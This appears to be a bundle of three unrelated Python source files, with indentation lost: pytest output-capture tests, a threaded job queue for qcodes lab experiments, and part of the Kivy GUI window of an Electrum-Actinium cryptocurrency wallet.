sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(OSError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
captureclass = staticmethod(TeeStdCapture)
def test_capturing_error_recursive(self):
r"""For TeeStdCapture since we passthrough stderr/stdout, cap1
should get all output, while cap2 should only get "cap2\n"."""
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\ncap2\n"
assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.start_capturing()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from fnmatch import fnmatch
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert fnmatch(repr(cap.out), "<FDCapture 1 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(1, b"stdout")
assert cap.readouterr() == ("stdout", "")
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert fnmatch(repr(cap.err), "<FDCapture 2 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(2, b"stderr")
assert cap.readouterr() == ("", "stderr")
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert fnmatch(repr(cap.in_), "<FDCapture 0 oldfd=* _state='initialized' tmpfile=*>")
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_fdcapture_invalid_fd_with_fd_reuse(self, testdir):
with saved_fd(1):
os.close(1)
cap = capture.FDCaptureBinary(1)
cap.start()
os.write(1, b"started")
cap.suspend()
os.write(1, b" suspended")
cap.resume()
os.write(1, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(1, b"done")
def test_fdcapture_invalid_fd_without_fd_reuse(self, testdir):
with saved_fd(1), saved_fd(2):
os.close(1)
os.close(2)
cap = capture.FDCaptureBinary(2)
cap.start()
os.write(2, b"started")
cap.suspend()
os.write(2, b" suspended")
cap.resume()
os.write(2, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(2, b"done")
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
def test_fdcapture_tmpfile_remains_the_same() -> None:
cap = StdCaptureFD(out=False, err=True)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize(
"method", ["SysCapture(2)", "SysCapture(2, tee=True)", "FDCapture(2)"]
)
def test_capturing_and_logging_fundamentals(testdir, method: str) -> None:
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(
in_=None,
out=None,
err=capture.%s,
)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "replace"
assert sys.stderr.errors == "replace"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win"), reason="only on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams() -> None:
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = cast(TextIO, DummyStream())
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*OSError*")
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, call, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
out = result_with_capture.stdout.str()
assert ("TypeError: write() argument must be str, not bytes" in out) or (
"TypeError: unicode argument expected, got 'bytes'" in out
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
ef = capture.EncodedFile(tmpfile, encoding="utf-8")
with pytest.raises(TypeError):
ef.writelines([b"line1", b"line2"])
assert ef.writelines(["line3", "line4"]) is None # type: ignore[func-returns-value]
ef.flush()
tmpfile.seek(0)
assert tmpfile.read() == b"line3line4"
tmpfile.close()
with pytest.raises(ValueError):
ef.read()
def test__get_multicapture() -> None:
assert isinstance(_get_multicapture("no"), MultiCapture)
pytest.raises(ValueError, _get_multicapture, "unknown").match(
r"^unknown capturing method: 'unknown'"
)
def test_logging_while_collecting(testdir):
"""Issue #6240: Calls to logging.xxx() during collection causes all logging calls to be duplicated to stderr"""
p = testdir.makepyfile(
"""\
import logging
logging.warning("during collection")
def test_logging():
logging.warning("during call")
assert False
"""
)
result = testdir.runpytest_subprocess(p)
assert result.ret == ExitCode.TESTS_FAILED
result.stdout.fnmatch_lines(
[
"*test_*.py F*",
"====* FAILURES *====",
"____*____",
"*--- Captured log call*",
"WARNING * during call",
"*1 failed*",
]
)
result.stdout.no_fnmatch_line("*Captured stderr call*")
result.stdout.no_fnmatch_line("*during collection*")
|
job_mgmt.py
|
from core_tools.job_mgnt.job_meta import job_meta
from dataclasses import dataclass, field
from typing import Any
import time
import threading
from queue import PriorityQueue
@dataclass(order=True)
class ExperimentJob:
priority: float
job: Any = field(compare=False)
def kill(self):
self.job.KILL = True
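# Illustrative sketch: because the dataclass above is declared with order=True
# and the job field uses compare=False, two ExperimentJob instances compare on
# `priority` alone, which is what the PriorityQueue in queue_mgr relies on.
# a_job and b_job below are hypothetical job objects:
#
#     low = ExperimentJob(priority=2, job=a_job)
#     high = ExperimentJob(priority=1, job=b_job)
#     assert high < low   # the smaller priority value is served first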
class job_wrapper_helper(metaclass=job_meta):
def __init__(self, function, *args, **kwargs):
self.func = function
self.args = args
self.kwargs = kwargs
def run(self):
return self.func(*self.args, **self.kwargs)
def job_wrapper(func):
'''
Wrapper that can turn any function into a job.
'''
def wrap(*args, **kwargs):
# j = job_wrapper_helper(func, *args, **kwargs)
# queue = queue_mgr()
# queue.put(ExperimentJob(1, job = j))
func(*args, **kwargs)
return wrap
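# Hypothetical usage sketch, assuming the queued path commented out above were
# re-enabled (all names below are placeholders):
#
#     @job_wrapper
#     def calibrate():
#         print('calibrating')
#
#     calibrate()   # with the queue path enabled, this would wrap the call in
#                   # job_wrapper_helper and put ExperimentJob(1, job=...) on
#                   # the queue_mgr singleton instead of running it inline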
class queue_mgr():
__instance = None
__init = False
q = None
job_refs = []
def __new__(cls):
if queue_mgr.__instance is None:
queue_mgr.__instance = object.__new__(cls)
return queue_mgr.__instance
def __init__(self):
if not self.__init:
print('initializing')
self.q = PriorityQueue()
self.job_refs = list()
def worker():
while True:
n_jobs = self.q.qsize()
if n_jobs != 0:
print('{} items queued.'.format(n_jobs))
print('Starting new job.')
job_object = self.q.get()
try:
print(job_object.job.KILL)
if job_object.job.KILL != True:
job_object.job.run()
except Exception as e:
print('An exception occurred in the job; moving on to the next job.')
print(e)
self.q.task_done()
else:
# 200ms sleep.
time.sleep(0.2)
self.worker_thread = threading.Thread(target=worker, daemon=True)
self.worker_thread.start()
self.__init = True
def put(self, job):
'''
put a job into the measurement queue
Args:
job (ExperimentJob) : job object
'''
self.q.put(job)
self.job_refs.append(job)
def kill(self, job):
'''
kill a certain job that has been submitted to the queue
Args:
job (ExperimentJob) : job object
'''
job.kill()
def killall(self):
'''
kill all the jobs
'''
for job in self.job_refs:
job.kill()
self.job_refs = []
def join(self):
self.q.join()
@property
def n_jobs(self):
return self.q.qsize()
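# Minimal sketch of the implicit job protocol the worker loop above appears to
# rely on: a submitted job only needs a KILL flag and a run() method.
# DummyJob is a hypothetical example:
#
#     class DummyJob:
#         KILL = False
#         def run(self):
#             print('running dummy job')
#
#     # q = queue_mgr()
#     # q.put(ExperimentJob(priority=1, job=DummyJob()))
#     # q.join()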
#%%
if __name__ == '__main__':
from core_tools.sweeps.sweeps import do1D, do2D
import os
import qcodes as qc
from qcodes.dataset.sqlite.database import initialise_or_create_database_at
from qcodes.dataset.experiment_container import load_or_create_experiment
from qcodes.instrument.specialized_parameters import ElapsedTimeParameter
@job_wrapper
def test():
print('blah')
test()
# class MyCounter(qc.Parameter):
# def __init__(self, name):
# # only name is required
# super().__init__(name, label='Times this has been read',
# docstring='counts how many times get has been called '
# 'but can be reset to any integer >= 0 by set')
# self._count = 0
# # you must provide a get method, a set method, or both.
# def get_raw(self):
# self._count += 1
# return self._count
# def set_raw(self, val):
# self._count = val
# tutorial_db_path = os.path.join(os.getcwd(), 'linking_datasets_tutorial.db')
# initialise_or_create_database_at(tutorial_db_path)
# load_or_create_experiment('tutorial', 'no sample')
# my_param = MyCounter('test_instr')
# x = qc.Parameter(name='x', label='Voltage_x', unit='V',
# set_cmd=None, get_cmd=None)
# y = qc.Parameter(name='y', label='Voltage_y', unit='V',
# set_cmd=None, get_cmd=None)
# timer = ElapsedTimeParameter('time')
# scan1 = do2D(x, 0, 20, 20, 0.0, y, 0, 80, 30, 0.1, my_param)
# scan2 = do2D(x, 0, 20, 20, 0.0, timer, 0, 80, 30, .1, my_param)
# scan3 = do1D(x, 0, 100, 50, 0.1 , my_param, reset_param=True)
# q = queue_mgr()
# job1 = ExperimentJob(1, scan1)
# job2 = ExperimentJob(1, scan2)
# job3 = ExperimentJob(1, scan3)
# q.put(job1)
# q.put(job2)
# q.put(job3)
# q.killall()
# scan1 = do2D(x, 0, 20, 20, 0.0, y, 0, 80, 30, 0.1, my_param)
# scan2 = do2D(x, 0, 20, 20, 0.0, timer, 0, 80, 30, .1, my_param)
# job1 = ExperimentJob(1, scan1)
# job2 = ExperimentJob(1, scan2)
# q.put(job1)
# q.put(job2)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum_acm as electrum
from electrum_acm.bitcoin import TYPE_ADDRESS
from electrum_acm import WalletStorage, Wallet
from electrum_acm_gui.kivy.i18n import _
from electrum_acm.paymentrequest import InvoiceStore
from electrum_acm.util import profiler, InvalidPassword
from electrum_acm.plugins import run_hook
from electrum_acm.util import format_satoshis, format_satoshis_plain
from electrum_acm.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_acm_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_acm_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_acm_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_acm_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register a widget cache to keep memory usage down; a timeout of 0 caches
# the data forever
Cache.register('electrum_acm_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_acm_gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_acm.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_acm.bitcoin import NetworkConstants
pp = servers.get(host, NetworkConstants.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'actinium':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'ACM')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
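# Worked example of the conversion arithmetic above with hypothetical numbers,
# assuming base_units[self.base_unit] == 8 and an exchange rate of 2.00:
# btc_to_fiat('1.5') -> get_amount('1.5 ACM') == 150_000_000 satoshis,
# then 150_000_000 * 2.00 / 10**8 == 3.00, formatted as "3".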
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Current screen orientation of the device.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Electrum-Actinium App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so that updates happen at most twice a second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_acm.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('actinium:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_acm.transaction import Transaction
from electrum_acm.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_acm.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum_acm.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
